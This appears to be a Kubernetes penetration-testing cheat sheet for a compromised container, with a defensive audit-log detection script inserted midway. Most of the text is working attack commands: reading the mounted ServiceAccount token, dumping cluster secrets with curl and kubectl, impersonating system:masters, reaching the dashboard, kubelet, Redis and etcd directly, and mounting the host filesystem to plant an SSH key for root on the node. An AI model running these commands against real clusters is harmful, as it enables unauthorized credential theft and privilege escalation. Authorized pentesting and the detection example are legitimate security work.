Compromised Container
Access to Container
NCC Attack Chain / Pentest process
In addition to this page, review: Deep Dive into Real-World Kubernetes Threats
Install custom tools (and prove Internet access)
    curl -sLO https://storage.googleapis.com/kubernetes-release/release/v1.8.4/bin/linux/amd64/kubectl
    chmod +x kubectl
    mv kubectl /bin

Obtain the default ServiceAccount token
    ls /var/run/secrets/kubernetes.io/serviceaccount/
    ca.pem namespace token
    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
    NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

Find API server IP and interact with curl
    env | grep KUBE
    K8S=https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/
    curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz

Interact with kubectl
    kubectl --token=<TOKEN> get nodes --all-namespaces

Obtain all secrets
    - Obtain Service Account Token
      $ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
    - Obtain master IP
      $ kubectl cluster-info
      Kubernetes master is running at MASTER-IP:8443
    - Check that TOKEN can list secrets in default namespace
      $ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'

Impersonate privileged account
    kubectl get secrets --as=null --as-group=system:masters
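On the defensive side, two of the steps in this table leave a clear trace in the API server audit log: the pod's automounted default ServiceAccount reading secrets, and an --as/--as-group request that lands in system:masters (the request's impersonatedUser field). The Python below is an added example, not from the original page or from NCC Group: it scans constructed audit events (real audit.k8s.io/v1 field names, made-up values) and labels each event that matches either step.

```python
import json

# Constructed sample events in the audit.k8s.io/v1 Event shape (real field names, made-up values).
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"verb": "list", "requestURI": "/api/v1/namespaces/default/secrets",
     "user": {"username": "system:serviceaccount:default:default"},
     "objectRef": {"resource": "secrets", "namespace": "default"}, "responseStatus": {"code": 200}},
    {"verb": "get", "requestURI": "/healthz",
     "user": {"username": "system:serviceaccount:default:default"}, "responseStatus": {"code": 200}},
    {"verb": "list", "requestURI": "/api/v1/secrets", "user": {"username": "alice", "groups": ["developers"]},
     "impersonatedUser": {"username": "null", "groups": ["system:masters"]},
     "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}},
    {"verb": "list", "requestURI": "/api/v1/namespaces/team-a/pods",
     "user": {"username": "system:serviceaccount:team-a:ci-runner"},
     "objectRef": {"resource": "pods", "namespace": "team-a"}, "responseStatus": {"code": 200}},
])
SENSITIVE_RESOURCES = {"secrets"}
PRIVILEGED_GROUPS = {"system:masters"}

def classify(event):
    """Return labels of the table steps above that this one audit event matches."""
    findings = []
    username = event.get("user", {}).get("username", "")
    resource = event.get("objectRef", {}).get("resource")
    # "Obtain all secrets": a pod's automounted default ServiceAccount token reading secrets.
    is_default_sa = username.startswith("system:serviceaccount:") and username.endswith(":default")
    if is_default_sa and resource in SENSITIVE_RESOURCES:
        findings.append("default-sa-secrets-access")
    # "Impersonate privileged account": an --as/--as-group request landing in system:masters.
    impersonated = event.get("impersonatedUser") or {}
    if PRIVILEGED_GROUPS & set(impersonated.get("groups", [])):
        findings.append("impersonation-of-system:masters")
    return findings

def scan(audit_log):
    """Parse newline-delimited audit events; return (user, requestURI, findings) for each hit."""
    hits = []
    for line in filter(str.strip, audit_log.splitlines()):
        event = json.loads(line)
        findings = classify(event)
        if findings:
            hits.append((event["user"]["username"], event["requestURI"], findings))
    return hits

if __name__ == "__main__":
    for user, uri, findings in scan(SAMPLE_AUDIT_LOG):
        print(f"{user} {uri} -> {', '.join(findings)}")
```

An audit policy that records secrets and impersonated requests at least at the Metadata level provides every field this script reads; a policy that omits the secrets resource will hide the first finding entirely.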
Dashboard/APIs

Direct Dashboard Access
    curl -s http://kubernetes-dashboard.kube-system

Direct APIs Access
    kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
    192.168.64.11:6443
    curl -s http://192.168.64.11:6443

Access the Kubelet API (kubelet-exploit)
    See Kubelet Exploit
Network

Port Scan
    See Network page

Access Other Services Inside the Cluster Directly
    redis-cli -h redis-master.default
ETCD

Direct ETCD Access (and obtain root on underlying node)
    - Obtain a Kubelet or higher SA token
    - Schedule a Pod and mount the host filesystem
    - Add an SSH key
    - SSH into the node
    $ curl -s http://<kubernetes-IP>:2379/v2/keys/?recursive=true

Direct ETCD Access (review the content)
    - Obtain a copy of etcdctl
    - Query the API
    - Review/dump the content

    $ curl -sLO https://github.com/coreos/etcd/releases/download/v3.1.5/etcd-v3.1.5-linux-amd64.tar.gz
    # Query the API - v2 (K8s <= 1.5)
    # And explore the config
    # /registry/secrets/default may contain the default service token
    $ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls
    # Query the API - v3
    # Dump an instance of the etcd database to a file on disk
    # Read the file with: https://github.com/br0xen/boltbrowser
    $ export ETCDCTL_API=3
    $ etcdctl snapshot